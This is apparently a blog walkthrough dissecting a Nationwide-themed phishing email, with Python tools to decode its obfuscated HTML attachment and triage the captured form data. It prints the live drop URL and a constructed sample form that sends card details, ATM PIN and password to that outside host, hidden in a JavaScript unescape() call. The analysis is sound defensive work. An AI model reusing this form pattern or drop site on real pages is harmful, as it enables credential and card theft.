So like most of you, I get lots of phishing emails, and normally the filters catch them. I do however like to look at them and see what they are doing. This one, which I got today, has so many things wrong with it that it was worth writing up.

As you can see, firstly the “From” name is different from the email address it came from, or should I say the one it tells me it is from. It would be very rare for a financial organization not to use its own domain for customer email. Secondly, we see an attachment in HTML format, which a bank simply would not send. Organizations like this would normally send a link to an online service, and in reality, if the activity really had been deemed suspicious, they would have called you by now. Lastly, we see instructions to complete the attached form, which of course goes against any security policy a bank publishes: they never ask you to enter your details into a form that arrived by email.

So what does the form contain?

If we download the HTML file and open it in a text editor, we see that the content is encoded rather than plain markup.

Of course we could take some time to see what it is doing by unpicking the encoded text, however it is much more fun to see what it looks like in the browser (do this in a throwaway VM, never on your day-to-day machine).

How good does that look?

If you hover over the links, they all point to real locations. An example is the “Getting Started” link on the left, which points to the real site: http://www.nationwide.co.uk/support/ways-to-bank/internet-banking/features-and-benefits. Copying the real site’s navigation is a cheap way to make a cloned page look legitimate.

Notice the glaring issues with the form?

None of the details being asked for would be needed at all; at most, a bank “might” ask for one of them as confirmation, and only after you had logged back into your account first. I particularly like how the form asks for all the card details, including the “ATM PIN”, which no financial institution would ever ask for. It then asks for personal details, which help the attacker to “pretend” to be you.

If we now press the “Continue” button with empty values, we see that it even has validation. Notice, though, that I can type whatever I want in those fields and it is accepted, which would not happen on a real site either. Most legitimate sites use some “on-the-fly” validation now, and a banking site would at least reject a card number that is not a valid card number.

Now let’s press the “Continue” button after completing the details. We get a little message.

Using Fiddler, we can see that it first sends some data to a site under the financial institution’s real domain.

However, it also submits the data to the following URL:

http://fa.shahidatoot.com/wp-content/plugins/ultimate-posts-widget/submit.php

Once this piece is completed, it redirects back to the real “Nationwide” website. The path, a submit.php dropped inside a WordPress plugin directory, suggests a compromised WordPress site being used to collect the data, which is a common pattern for this kind of kit. Taking a closer look at the steps, you can see the flow.

  1. Existing Nationwide site
  2. Custom “Submission” site
  3. Existing Nationwide site
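The flow above was found dynamically with Fiddler. As an added example (not from the original post), here is a small Python script that does the static version of the same analysis: decode an attachment of this kind and list every link or form target that points outside the brand’s own domain. The sample attachment is constructed for the example by hiding the markup inside a JavaScript unescape() call, one common obfuscation for HTML attachments; the real attachment’s encoding is not shown in the post, so that is an assumption, and the expected domain is a parameter.

```python
import html
import re
from urllib.parse import quote, unquote, urlparse

# Constructed sample, not the attachment from the post: the visible markup is
# hidden inside a JavaScript unescape("...") call, so a casual look at the file
# shows only percent-encoded text. The two URLs are the ones quoted in the post.
_INNER_MARKUP = (
    '<html><body>'
    '<a href="http://www.nationwide.co.uk/support/ways-to-bank/'
    'internet-banking/features-and-benefits">Getting Started</a>'
    '<form method="post" action="http://fa.shahidatoot.com/wp-content/'
    'plugins/ultimate-posts-widget/submit.php">'
    '<input name="c1"><input name="atm" type="password">'
    '<input type="submit" value="Continue">'
    '</form></body></html>'
)
SAMPLE_ATTACHMENT = (
    '<script>document.write(unescape("%s"));</script>'
    % quote(_INNER_MARKUP, safe="")
)

# unescape("...") or unescape('...'); the encoded body never contains the quote
# character itself because quotes are encoded as %22 / %27
_UNESCAPE_CALL = re.compile(r"""unescape\(\s*(["'])(.*?)\1\s*\)""", re.S)
_JS_UNICODE = re.compile(r"%u([0-9a-fA-F]{4})")
_URL_ATTR = re.compile(r"""\b(href|action|src)\s*=\s*["']?([^"'\s>]+)""", re.I)


def js_unescape(text):
    """Mimic JavaScript unescape(): decode %uXXXX first, then %XX sequences."""
    text = _JS_UNICODE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return unquote(text)


def decode_attachment(src, max_layers=5):
    """Peel unescape() layers until the source stops changing (kits sometimes nest them)."""
    for _ in range(max_layers):
        decoded = _UNESCAPE_CALL.sub(lambda m: js_unescape(m.group(2)), src)
        if decoded == src:
            break
        src = decoded
    return src


def extract_urls(markup):
    """Return (attribute, url) pairs for every href/action/src in the markup."""
    return [(attr.lower(), html.unescape(url)) for attr, url in _URL_ATTR.findall(markup)]


def is_expected_host(host, expected_domains):
    """True if host is the brand's domain or a subdomain of it."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in expected_domains)


def find_offdomain_targets(src, expected_domains=("nationwide.co.uk",)):
    """Decode the attachment and list every link/form target outside the brand's
    domain. A form 'action' in this list is where the victim's data is sent."""
    hits = []
    for attr, url in extract_urls(decode_attachment(src)):
        host = urlparse(url).hostname
        if host and not is_expected_host(host, expected_domains):
            hits.append((attr, url))
    return hits


if __name__ == "__main__":
    for attr, url in find_offdomain_targets(SAMPLE_ATTACHMENT):
        print(f"{attr:>6}: {url}")
```

Run it against a real attachment by reading the file into find_offdomain_targets() with the brand’s domain; anything reported under “action” is the drop site, and hosts that only appear under “href” are usually just the cloned navigation. Kits that use other encodings (base64, custom character shifts) need a matching decoder added in place of js_unescape().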

So what was submitted to the “Submission” site?

Using Fiddler, we can simply select the custom site URL and see the “POST” details. Using the “WebForms” view, we can see all of the data that was posted from the form.

It is sent as a URL-encoded form body in the POST request, the same key=value&… format you would see in a query string.

Using the “TextView” we can see the full POST body.

__token=WIrhIATNh0Qj6GIq6QvJ7E3TW1rkNVGFYnxt7tVchCE%3D&CurrentAccountCardDetailsViewModel.SubmittedCardNumber=1234567890123456&c1=1234&c2=5678&c3=9012&c4=3456&e1=01&e2=15&cvv=123&atm=1234&cst=1234567890&memo=Some+Text&pass=123456
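Two things stand out in that body: the two long parameter names (the token and CurrentAccountCardDetailsViewModel.SubmittedCardNumber) look like ASP.NET MVC field names copied from the real login form, while the short names (c1 to c4, e1, e2, cvv, atm, cst, memo, pass) are the kit’s own, and the four card groups concatenate to the same card number sent in the long field. As an added example (not from the original post), here is a Python triage helper for exactly this kind of captured body: it parses the fields, checks the card number against Luhn so you know whether a real card may have been exposed, masks it for a report, and lists the high-risk fields present. The meanings of “cst” and “memo” are my reading of the form and are marked as assumptions in the code.

```python
from urllib.parse import parse_qs

# The POST body captured in Fiddler, as shown in the post (the author typed
# dummy values into the form, so the card number is not a real one).
CAPTURED_BODY = (
    "__token=WIrhIATNh0Qj6GIq6QvJ7E3TW1rkNVGFYnxt7tVchCE%3D"
    "&CurrentAccountCardDetailsViewModel.SubmittedCardNumber=1234567890123456"
    "&c1=1234&c2=5678&c3=9012&c4=3456&e1=01&e2=15&cvv=123&atm=1234"
    "&cst=1234567890&memo=Some+Text&pass=123456"
)

PAN_FIELD = "CurrentAccountCardDetailsViewModel.SubmittedCardNumber"

# What each parameter most likely carries. "cst" and "memo" are assumptions
# based on what the form asked for, not something the kit states.
FIELD_MEANING = {
    "__token": "anti-forgery token (name appears copied from the real form)",
    PAN_FIELD: "full card number (name appears copied from the real form)",
    "c1": "card number group 1", "c2": "card number group 2",
    "c3": "card number group 3", "c4": "card number group 4",
    "e1": "expiry month", "e2": "expiry year",
    "cvv": "card security code",
    "atm": "ATM PIN",
    "cst": "customer number (assumed)",
    "memo": "memorable information (assumed)",
    "pass": "online banking password",
}

# Fields that on their own let someone spend the card or log in as the victim
HIGH_RISK = {PAN_FIELD, "cvv", "atm", "pass"}


def luhn_valid(pan):
    """Standard Luhn check: a real card number passes, dummy data usually does not."""
    digits = [int(c) for c in pan if c.isdigit()]
    if not 12 <= len(digits) <= 19:
        return False
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(pan):
    """Keep the first six and last four digits, as you would in an incident report."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def triage_post_body(body):
    """Parse a captured form body and summarise what the victim handed over."""
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    pan = fields.get(PAN_FIELD, "")
    groups = "".join(fields.get(f"c{i}", "") for i in range(1, 5))
    return {
        "pan_masked": mask_pan(pan) if pan else None,
        "pan_luhn_valid": luhn_valid(pan),
        # the kit collects the card number twice; check both copies agree
        "card_groups_match_pan": bool(pan) and groups == pan,
        "expiry": f"{fields.get('e1', '?')}/{fields.get('e2', '?')}",
        "high_risk_fields_present": sorted(HIGH_RISK & set(fields)),
        "unknown_fields": sorted(set(fields) - set(FIELD_MEANING)),
        "field_summary": {k: FIELD_MEANING.get(k, "unknown") for k in fields},
    }


if __name__ == "__main__":
    report = triage_post_body(CAPTURED_BODY)
    for key, value in report.items():
        print(f"{key}: {value}")
```

For the body in the post the Luhn check fails, as expected for the dummy number typed into the form; on a real capture a passing check is your cue to get the card blocked, and the masked value is what goes into the ticket.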

So the word of warning here is to check and check again before you ever follow a process like this. If you get an email that looks legitimate but you are not 100% sure, call the organization first to double check, using the number on your card or statement rather than one from the email. Better to be safe than sorry.